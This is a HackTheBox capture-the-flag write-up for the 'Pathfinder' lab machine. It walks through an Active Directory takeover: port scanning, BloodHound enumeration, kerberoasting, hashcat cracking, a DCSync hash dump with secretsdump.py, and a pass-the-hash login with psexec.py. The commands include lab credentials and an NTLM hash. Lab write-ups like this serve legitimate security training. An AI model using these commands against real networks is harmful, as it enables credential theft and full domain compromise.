CTF-Writeups/HackTheBox/Pathfinder.md

162 lines
5.9 KiB
Markdown
Raw Normal View History

2021-05-09 03:23:03 +00:00
# HackTheBox-Pathfinder
## Rustscan
```bash
rustscan -a 10.10.10.30 -- -A -sC -sV
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
😵 https://admin.tryhackme.com
Open 10.10.10.30:53
Open 10.10.10.30:88
Open 10.10.10.30:135
Open 10.10.10.30:139
Open 10.10.10.30:389
Open 10.10.10.30:445
Open 10.10.10.30:464
Open 10.10.10.30:593
Open 10.10.10.30:636
Open 10.10.10.30:3268
Open 10.10.10.30:3269
Open 10.10.10.30:5985
Open 10.10.10.30:9389
PORT STATE SERVICE REASON VERSION
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-05-09 07:40:32Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
```
## PORT 139/445 (SMB)
We check for smb share if there are any
<img src="https://imgur.com/4NFZwar.png"/>
Let's test for brute forcing any user name
<img src="https://imgur.com/JbQwBvh.png"/>
We didn't get anything out of it but found host name `PATHFINDER`, so let's move on to a different port
## PORT 389 (LDAP)
We wil be using Python based ingestor for BloodHound,by specifiying the username and password `sandra:Password1234!` which I don't know where I could find them , in the official writeups it was referenced to be found from a previous machine which they didn't mention so I am going to use these credentials to authenticate when using this python tool
```
python3 bloodhound.py -d 'megacorp.local' -u 'sandra' -p 'Password1234!' -gc 'pathfinder.megacorp.local' -c all -ns 10.10.10.30
```
Let's break down the arugments here
-d ---> This is for specifying domain name in this case we have a domain `megacorp.local` which can be seen from nmap scan
-u ---> This is for specifying a username
-p ---> This is for specifying a password
-gc ---> This is for specifying name of the host which is `pathfinder` which we have seen when we were trying to use crackmapexec to brute force users
-c ---> This is for collection method and we set this to `all` which will try to dump information regarding roup, LocalAdmin, Session, Trusts, Default (all previous),DCOnly (no computer connections), DCOM, RDP,PSRemote, LoggedOn, ObjectProps, ACL, All (all except LoggedOn)
-ns ---> This is for specifying the name server in this case it is the machine IP
<img src="https://imgur.com/rxFVXGf.png"/>
We now have these json files
<img src="https://imgur.com/7mqammn.png"/>
Let's start `neo4j` and `bloodhound` and import these files into it
<img src="https://imgur.com/uJwJ1wX.png"/>
<img src="https://imgur.com/9evO4pF.png"/>
Create an archive for this json files
<img src="https://imgur.com/uq8PceG.png"/>
Drag and drop the archive into the bloodhound GUI. Run the query of `Find All Domain Admins`
<img src="https://imgur.com/5xjSbZF.png"/>
Run the query of `Find All kerberoastable Accounts`
<img src="https://imgur.com/u2Lm7OX.png"/>
Run query of `Find Path to kerberoastable Accounts`
<img src="https://imgur.com/r7N7giw.png"/>
So from running these queries we know that service account `SVC_BES` is kerberoastable, let's run the python script `GetNPUsers.py` from `Impacket`
<img src="https://imgur.com/KZZQZyI.png"/>
Now running with `-request` parameter we can get a TGT hash
<img src="https://imgur.com/nt8ec28.png"/>
Going to hashcat examples we can see what type of hash is this
<img src="https://imgur.com/fuyMeAn.png"/>
So we are going to use `hashcat` to crack the hash
<img src="https://imgur.com/1P5Ipa9.png"/>
<img src="https://imgur.com/pbbCHsk.png"/>
Now we have cracked the kerberoast hash since winrm port (5985) is open we can use `evil-winrm` to login with the new credentials
<img src="https://imgur.com/lxiQopZ.png"/>
Now here let's look the result of our loot from bloodhound by running the `DCsync` query which will allow us to dump hashes from NTDS.dit which holds the passwords for all acounts in AD
<img src="https://i.imgur.com/TdYo58x.png"/>
We can see the user which we kerberoasted has privileges for `GetChangesAll` which means we can request for replication for NTDS.dit
<img src="https://imgur.com/EqDwWvM.png"/>
Using `secretsdump.py` for dumping hashes from NTDS.dit
```
./secretsdump.py 'MEGACORP.LOCAL/svc_bes':'Sheffield19'@10.10.10.30 -just-dc-ntlm
```
<img src="https://imgur.com/j0ocoSy.png"/>
We have the hashes and we don't need to crack these hash we can use `psexec.py` or `evil-wirm` to authenticate our selves
<img src="https://imgur.com/BgBLDsr.png"/>
```
python psexec.py MEGACORP.LOCAL/Administrator@10.10.10.30 -hashes 'aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18'
```
<img src="https://imgur.com/dBUUfqn.png"/>